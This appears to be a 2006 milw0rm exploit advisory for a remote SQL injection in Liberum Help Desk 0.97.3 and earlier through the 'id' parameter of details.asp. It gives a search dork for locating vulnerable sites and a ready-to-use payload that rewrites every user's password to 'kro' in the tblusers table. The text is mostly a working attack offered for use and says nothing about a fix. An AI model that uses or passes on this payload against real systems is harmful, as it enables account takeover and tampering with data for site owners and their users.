23 lines
No EOL
624 B
Text
23 lines
No EOL
624 B
Text
*******************************************************************************
|
|
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
|
|
|
|
*******************************************************************************
|
|
|
|
###http://[target]/[path]//details.asp?id=[SQL]
|
|
|
|
Example:
|
|
|
|
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
|
|
|
|
=> All Password Changed to "kro"
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-11-25] |